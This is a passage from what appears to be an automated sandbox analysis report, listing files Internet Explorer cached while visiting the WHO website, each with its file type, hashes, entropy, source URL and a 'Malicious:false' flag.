                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\142.feb3b57b86599b08d012[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1226
                                                                                                                                                                    Entropy (8bit):4.313458904326628
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:dl+Bauhfd8uONE6ydvtTbAjGjuX310i2gRjjMN:dEfd8uOOdhAkiD4
                                                                                                                                                                    MD5:E823D5B65795FB724B8767DA3BBB784A
                                                                                                                                                                    SHA1:E30468D97EC27FCAF0228AE80000C1DE9A71F876
                                                                                                                                                                    SHA-256:A704781B62EC35CC7A6887777A7D34887E789C2C65B4237C670A1C6A37D1ADD8
                                                                                                                                                                    SHA-512:54C2CECA535D27CDD980F5419435289D57B84D6B3C82EED671904E14746614171484AFDB989C841FD1230243012459316CF4B521347C450BA83882E9671CF6E1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/142.feb3b57b86599b08d012.js
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\50060660951_bfa6a3fb80_o[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x512, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):75277
                                                                                                                                                                    Entropy (8bit):7.982552135572392
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:Zd4g2v5zEElXj89KsKvV6l0TbeV8U+s1rgMwB0Sry9+BVp+vER7GOU:0gy5zEoXjTsKw6TbUNrZt+SW7NU
                                                                                                                                                                    MD5:5524F9B2C9AEBB963928570B5F3A7DCA
                                                                                                                                                                    SHA1:8B28870E47DF29BD1D54CB2E8445981ED6F898D9
                                                                                                                                                                    SHA-256:7C7B9E6103984011AFD1719CF4D8EC232EAEEAB94D84163257A5F9F5AD586666
                                                                                                                                                                    SHA-512:59FC514D0235364157A95EC544DDE2740A02EC1E973672665CAB371C7C8617879A0083A1B1EEA080409AF6ECD2BA918CE46E229683A1421D897F4D2580FC637A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/health-topics/coronavirus/vaccines/50060660951_bfa6a3fb80_o.tmb-768v.jpg?Culture=en&sfvrsn=1ff83aa2_6
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\KFOmCnqEu92Fr1Mu4mxM[1].woff
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:Web Open Font Format, TrueType, length 19824, version 1.1
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):19824
                                                                                                                                                                    Entropy (8bit):7.970306766642997
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:ozNCb8EbW9Wg166uwroOp/taiap3K6MC4fsPPuzt+7NCXzS65XZELt:K4zbWcDVwt230hfs+x+Bb65X2
                                                                                                                                                                    MD5:BAFB105BAEB22D965C70FE52BA6B49D9
                                                                                                                                                                    SHA1:934014CC9BBE5883542BE756B3146C05844B254F
                                                                                                                                                                    SHA-256:1570F866BF6EAE82041E407280894A86AD2B8B275E01908AE156914DC693A4ED
                                                                                                                                                                    SHA-512:85A91773B0283E3B2400C773527542228478CC1B9E8AD8EA62435D705E98702A40BEDF26CB5B0900DD8FECC79F802B8C1839184E787D9416886DBC73DFF22A64
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\analytics[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):48759
                                                                                                                                                                    Entropy (8bit):5.5215063523389265
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:/yR3fYFBLbfsce5XqY1TyPnHpX/KWY3SoavPVRhwmCgYUD0lgEw0stZc:/y9gZfA5h1UHpXxY3Soiuw0sU
                                                                                                                                                                    MD5:0A4E309B5F2D7439B4F8876B19F37FC7
                                                                                                                                                                    SHA1:7AC30F933A2B889EDBE5D3449F4EC90049B0E2A9
                                                                                                                                                                    SHA-256:F79723478F4C48501CD49AC52B81D6244A6562B9D3F08CE8AB208A8B8878D4C4
                                                                                                                                                                    SHA-512:891337D9CD308331BD0166BAA7C99C2B856D47F0ADE8AF596F71AFFC962546BBE0952554C51CC9A10E28BB4CEE3648AEC819D83A8935E69E95F53F5CBF141C44
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\auto-complete.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):3928
                                                                                                                                                                    Entropy (8bit):5.059292176433517
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:Wd+qgMN7GgZdOCB/BeQQ3hlPNgVy8TWbYbpLQcDjbCG3c48MlI7fuYLy:HJMZDdOCB/BeJ3fPNgVyvYbpL57CGM4r
                                                                                                                                                                    MD5:C9A1F1D2B5CC6BF36870A3789F605192
                                                                                                                                                                    SHA1:11137CABDC730169357EC6003C220FB5FD50D2B4
                                                                                                                                                                    SHA-256:8B83BBF4BB1A06D0CABD66D27CE16097E2193E6BA61202315036A762F3BF9450
                                                                                                                                                                    SHA-512:23E9593F7CA1EEB3A7A2CF52F6629AC9AA58A49E3C7E92B2A4606847599ADEA222F057BFBC534E765F7E7A8F532256F1C5240BDDD72E54DEDC1B407619C31CDC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/auto-complete.min.js?v=12.1.7126.28741
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\base[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1630322
                                                                                                                                                                    Entropy (8bit):5.577291963933718
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:XWG+SfiJoKIJmJfTMuyeSLTbglaEi3SibdnbyhSSuHe19:F54oKIJm5MuyeSLTbKaEX0Vyw89
                                                                                                                                                                    MD5:E7FC0B8E59C033566F83DD2B487FDD97
                                                                                                                                                                    SHA1:454A31823C255A961C6DD5F9EFEFD751289817A8
                                                                                                                                                                    SHA-256:EA2F8F066A67198D936648960646B97C9D8B12D6CA4D3D6C469C11D57B80E826
                                                                                                                                                                    SHA-512:94E3FD113869D0B5A5533E88AE9430272167E8A27D957792FCDC937FBC7F3BD4C1047B4E623E94606A2F687A25F4DC5B590D5DB73BACC3021196D2592603257B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/player_ias.vflset/en_US/base.js
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\embed[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):24206
                                                                                                                                                                    Entropy (8bit):5.489337007916026
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:gYRgyq+e82lVe4EybAwwNZogt6NcI/3C9ox1KOokdTUYuCDe+oelLGzjp86psMLR:0+1ieaDAa/C2fdoYuCjMjeYTLR
                                                                                                                                                                    MD5:A448025FA3F661B02A0BA439410E240A
                                                                                                                                                                    SHA1:289E6A0C054BD07384BBD13C813A49DA16CD4A34
                                                                                                                                                                    SHA-256:3F320F374543A2C2FA09A654BE7E75E245253477AF56D0BFCF429A132439994E
                                                                                                                                                                    SHA-512:3F111A8C4C375AE4677AE04572F8251DC78D9FB78A82C246DE4DF9CC38552D34E53CF1FDBD7717F5CE8019A2F1BEE62608B3021AEBABA09D87AE94CF19BA7043
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/player_ias.vflset/en_US/embed.js
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\geo-navigation.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):4042
                                                                                                                                                                    Entropy (8bit):4.97739876980254
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:etEbrus4gEOKpnlU6JZLgLBsB/u/KWjZxhcsZyycsKgxeqSQnlY2USBhUAStg0B6:eSbCgErnW0ahJmcnn+SuCQw8HR6H
                                                                                                                                                                    MD5:BAE0D95FBD9D5D06396203EBBC2D7AD4
                                                                                                                                                                    SHA1:21C148D0196327A1B7A888FF9B3FAE2E3CA8CF9B
                                                                                                                                                                    SHA-256:3606C9C51D3E40A62B104ADC154201393BCD2F32EEAB24B9E68F30640ADE49FD
                                                                                                                                                                    SHA-512:7AB4CBC0FA65E3B9BFA4106EB0A8D8DE76EC8DD903A1D9AA5434A40453E67EC407B36CE479C612AF3A0E603F78CE4C1252857747E032F710DB5CF28CB48B4538
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/geo-navigation.min.js?v=12.1.7126.28741
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\grid.min[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):9776
                                                                                                                                                                    Entropy (8bit):4.92362429027669
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:HeQVzGIs8vm9acJbnJVHKn1i3Jvit7E1blgweYRRpY4QgC0wopv2kcDt764ak98m:Fz6PI1XYg0uduASZGwk4iWED2oY02+Pt
                                                                                                                                                                    MD5:18D5B7714456CFEE0D12D865B29F53E3
                                                                                                                                                                    SHA1:ABB438FE358984E08CDE0C8CB4DD3B28C7827D68
                                                                                                                                                                    SHA-256:D382145051E07802C5A1C9D297284DBAB6C8E780821A7743937CD8B54CD4748D
                                                                                                                                                                    SHA-512:5F47246A02819D0BE396E7CBD481453FBC879DE3BD983CB5602CC9D1DD522A6936D57AB84072FA7C75ACBDA4FC37A579BCC4302BA5795A610D7FCD0C87756729
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/styles/grid.min.css?v=12.1.7126.28741
Preview: /*! Bootstrap Grid v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\gridTabs.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):3554
                                                                                                                                                                    Entropy (8bit):5.185775961938888
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:4Pd/ZZMhMvMRHjJB+qW+HSS3B99icWptI/8cWXFe4NXxv:4PdHkq0DT+qtHSkB9Rwy/FYeyXxv
                                                                                                                                                                    MD5:82C552DDA2DC66965C51340C8F207634
                                                                                                                                                                    SHA1:1DA244FBD4486C31DCF4C82AC0D83E66E924A7F4
                                                                                                                                                                    SHA-256:D282FEB90B2423F859BA7E658C76B24BC7644A3B3731C9DE4214785C5D29D09D
                                                                                                                                                                    SHA-512:E1C8622512661F93E45218873F412A1632935605B1AC20B3225628B6CC88EC0A8996DF75137E2B04DA069403BF6133E66C0563AAAA05B19C5D83980B87975284
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/gridTabs.min.js
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\kendo.ui.core.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):803934
                                                                                                                                                                    Entropy (8bit):5.222077205830172
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:QEhAfJKgbCSmZdO9cUi2YalCdAeEVBZn7zKy52gpLCefV0G8I9r2XixiHe0ms2eG:QEi30ZMdlCdeV9KpR3Y4PuqfoTeRnje
                                                                                                                                                                    MD5:7628C881DE245BBBD90C7E3275ED0CF6
                                                                                                                                                                    SHA1:047FD3A34DD8FF151D9EC5CB4B761FD686F5BA40
                                                                                                                                                                    SHA-256:97C447F965A97D0616E759515E2B04EE226B9F428CDAEFA5D7F4622E171B0227
                                                                                                                                                                    SHA-512:609EF651800C2D9374B4CAAB553A41F8AA6BCE92EE9E5AF812B17157806A8E60E33FAE910E04BF29599C8036216B3A02E8D8F807637EFBCBFD850341860401B0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://kendo.cdn.telerik.com/2018.1.221/js/kendo.ui.core.min.js
                                                                                                                                                                    Preview: /** . * Copyright 2018 Telerik AD . * . * Licensed under the Apache License, Version 2.0 (the "License"); . * you may not use this file except in compliance with the License. . * You may obtain a copy of the License at
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\lazy.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):5023
                                                                                                                                                                    Entropy (8bit):5.23885542276114
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:SJDcAeLclix/2TDevsJOV+x2VMOtZBqDZpqg8WcIfDIqLbY:KiwevQx2xtPqDz8WPRbY
                                                                                                                                                                    MD5:FFE17BDB80CBFD966472372D2FD4FDCF
                                                                                                                                                                    SHA1:79D919E6703EB3961482E65B2B39E64E713589B6
                                                                                                                                                                    SHA-256:B97A1A0CD9D3B8FBD5DA3EA8B471D88CBDAB6716C69A879AC4A985DB0430BBB3
                                                                                                                                                                    SHA-512:A485E523CF715EB89836F28D85D7057BB4140282C7BFCD3787CEE7FF185B0A3F4895825F6094CF2EB544C968461999091BAD9028677169FB2DD601B3903A12B6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/lazy.min.js?v=12.1.7126.28741
Preview: /*! jQuery & Zepto Lazy v1.7.8 - http://jquery.eisbehr.de/lazy - MIT&GPL-2.0 license - Copyright 2012-2018 Daniel 'Eisbehr' Kern */
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\main-navigation.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):9828
                                                                                                                                                                    Entropy (8bit):5.093226424905402
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:8QbztLkPc/BXT+6eaaR20BRynnCLEh6It:8QtLkPc/BiIaMsUnnCLK
                                                                                                                                                                    MD5:1612563D9D28237C5EB9D49DEADAAA6F
                                                                                                                                                                    SHA1:AC41D001EEAE6DABDFC05FE39A8B44D9F8686E80
                                                                                                                                                                    SHA-256:DAC30600520A22929B8B243673C877984B73F925031B93F826464940B3B651B4
                                                                                                                                                                    SHA-512:C47461C8B1299FEAB5E8C5EA47374F6E3436C125DD7EFD6F4C021ECB004236010479E9E7B747B6EA737E93A1BDB89488011EC63969DA10F229CFBC53BF12BFFF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/main-navigation.min.js?v=12.1.7126.28741
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\main.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):11430
                                                                                                                                                                    Entropy (8bit):5.144594889515115
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:nciHiFmzS8agB6KIyxWalg5iApyjh8HdHY3bEmCVKqvYkNK:nc38agB6KIyxWSg59py/AmUXYEK
                                                                                                                                                                    MD5:9FCF4BF717E1E57B5FE08F04FDB789E3
                                                                                                                                                                    SHA1:C80842DE477C3003968A5CC6A6094085395E1015
                                                                                                                                                                    SHA-256:B0A8FF662B7C4C48AACAED961DC95DD5510AF4FB4332A8C032515A643BDBD9C3
                                                                                                                                                                    SHA-512:066E8FDA471B72CE5857CC8D583568F275D80F815CCCCB8A0D5EE47FC0651081B6F83E70E8DFB477FB34AD805AC4184D14E8A7621C726486D691669450007732
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/main.min.js?v=12.1.7126.28741
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\modernizr-custom[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1932
                                                                                                                                                                    Entropy (8bit):5.322270716802443
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:k0goRY6Y+rED6l7zgFRDqBRYDy2ijbKcWOy5AZvxzC4Bb99Un/0b6+:k0VW6Ymi6i2Yy2i8Ux+4BHk0R
                                                                                                                                                                    MD5:5D426B02B9C57CB59F9794FB7F3C3B08
                                                                                                                                                                    SHA1:BCB93536FF21E28F492CB58FD84D758EA212904A
                                                                                                                                                                    SHA-256:B4E726211A45841267D6928692F63B03F1D05EE004619631731973521BFF0DC8
                                                                                                                                                                    SHA-512:E1CA135DAA723C385D1F5C719D77BB72CDC3308F43287E8216ABEA99869C8728C1E89D641188D759E85D1045536E3AFE803856916AF2AF9CEE57D2475D3FEA14
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/modernizr-custom.js?v=12.1.7126.28741
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\picturefill.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):14327
                                                                                                                                                                    Entropy (8bit):5.146561151612493
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:e3q5RUfWqxsurJV8/K+yeVQKxfidn452s92s3x/:e3q06K+yeVQKxd52sUA
                                                                                                                                                                    MD5:1F0F279A8200CF6E721AB08CA1C81639
                                                                                                                                                                    SHA1:67F7E2AB2B22308BE9DF864985A34059318E7EDF
                                                                                                                                                                    SHA-256:2C899B196A3DC020D87ACBEAE74C777D20B14FF8DD9A39F2BC79558D3DDD6D2D
                                                                                                                                                                    SHA-512:3AF8919BCC68F86525288A0233902603648BF87F4E0877C05708A57458C09EDB3E63377252F25D5F7AE9B8CF150C88A86ADD5759721E9FEF5B2CE131E4537D57
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/picturefill.min.js?v=12.1.7126.28741
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\select2.full.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):76272
                                                                                                                                                                    Entropy (8bit):5.376525345010871
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:P2oLNdg5pTT9aPCExIDiMd9QHhdvKGBokOl/NzTTeUBo47R0eq/OKnZprIf45w0F:xrWVEqDiMd9gekOZnlqGOHrAAg/KHHB
                                                                                                                                                                    MD5:37BEFED5B538FBAC224C5166E32F801B
                                                                                                                                                                    SHA1:4C3B2F9498A8CF39D3A4950277992C104514F86B
                                                                                                                                                                    SHA-256:9FF15425CA7BDB0F367EE5613EE729D7DC8108295F7E3D646100408F81E33C84
                                                                                                                                                                    SHA-512:638FAEF93FFA0E90DBD80913AF1B3778988DF68FEEFA5F292CDB7495244A9C97B6C080D50B077B37C69FCBEEF43E6AF916D9A85F92179B02BA1FB2656FC371F0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/select2.full.min.js?v=12.1.7126.28741
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\step-tabs.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):2202
                                                                                                                                                                    Entropy (8bit):4.890668908980952
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:pMDyFn0U9Eewl+H8XtIcQ0cE6yVS8kV82RHyuOK6IXA3aAIsDf:GDOn0w/c+H8XmcQ0w78kV82RHyuh3A3P
                                                                                                                                                                    MD5:CC8ED9DF753A06A20E4D38DC2525FB79
                                                                                                                                                                    SHA1:F61602D0CB38394569C038FBD060ABF63A92F580
                                                                                                                                                                    SHA-256:DE010FA266434EBAE4DFCE314553CAE937EC4977593B91DF45DDB3EAFB8EBA47
                                                                                                                                                                    SHA-512:E4058F5E27FEF8FC8A603FC0B92828717AB612442E62918540DAC9A24AB01A4020FDC41FFA44B9A9ACF41921BE1F59FA700675D13BB432AC3251A53EEF695E03
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/step-tabs.min.js
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\syria4[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 636x424, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):82358
                                                                                                                                                                    Entropy (8bit):7.989082270648955
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:i5BTrA7tn+P5DLD34aQUEF6ws/erz2nsa/h7CbjMqRMhI9LCSDmQ+PGj3VRzrrh:OXOVo/DNjbws/eJihGb/59GOmbejHzrt
                                                                                                                                                                    MD5:7DFD560C67882350865BDDCF94A0E5FD
                                                                                                                                                                    SHA1:13E22004A190A3D771BA385008EA3DF3DD8F24EA
                                                                                                                                                                    SHA-256:2C9F01E6F8CBBB782E59D598B6F587F7B524CE3027902E981EEA7B17CB4DEEDE
                                                                                                                                                                    SHA-512:72ADE60E60D0382E99EA827CD6BC4106B27AF4DC1564B84AB13E0D915F34916051DEC32D45A9FEDE0FB6B369945DA27CBB3EFAAE4E6E310F1FEC2B8FDAFD33A9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/imported/syria4.tmb-768v.jpg?Culture=en&sfvrsn=2109b312_30
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\thumbnail[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x460, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):17485
                                                                                                                                                                    Entropy (8bit):7.796617975598513
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:Msb1Ad12Y+ZJbJQEgjDASt8+c3PhJGz8dtkdyyQJDrt:Fb2d1EQEgPAStllTyRJd
                                                                                                                                                                    MD5:23B31DF85EA22577B1D53348C2A534DD
                                                                                                                                                                    SHA1:0E9B8D58173E82DC2E61524404A6A66DE22DF68D
                                                                                                                                                                    SHA-256:6057B63458CE651F821F50F3E517A9E90988A673888365EABE079C0F6DD54A7A
                                                                                                                                                                    SHA-512:DB427410EEA6F423EA655971F36A13E088E23C6DB7D978ECC63B11B5D35ECBE7E5FCBFED5EE637277F61F66E001D1D47274700C8ABFCAFE5E83C3EA9085CC2B2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/health-topics/coronavirus/science-in-5/thumbnail.tmb-768v.jpg?Culture=en&sfvrsn=78d4d94a_2
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\www-embed-player[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):165574
                                                                                                                                                                    Entropy (8bit):5.585249063675957
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:lhb0saDkMkUDzIadG/VAOVee5aikaHBNrLQ29L9ZPIyGAoJWjTTgSUHn8Cx50gyv:mRYESZDIo6AoJGTMtOc9F212fGqVQ
                                                                                                                                                                    MD5:9D9651855E2D8D103A3C372122FF32F3
                                                                                                                                                                    SHA1:7C6C1CF8C9F612F3FF96EB8E47A8349E4631761B
                                                                                                                                                                    SHA-256:ECE51F8EF5350CDA743D5A08859A2E35449E567EFEB91ABED07280497444168A
                                                                                                                                                                    SHA-512:6759D8D892B4254593DDC6D4A120461A899E4A368B93A16EDBD80374795F17520CC98D34776745304F88328F37B531C08F2ECCC5658FA81AD272760FA2A0B4DE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/www-embed-player.vflset/www-embed-player.js
                                                                                                                                                                    Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var da=ca(this);function t(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(e){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c("jscomp_symbol_"
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\1[1].txt
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):28012
                                                                                                                                                                    Entropy (8bit):4.885124285048976
                                                                                                                                                                    Encrypted:false
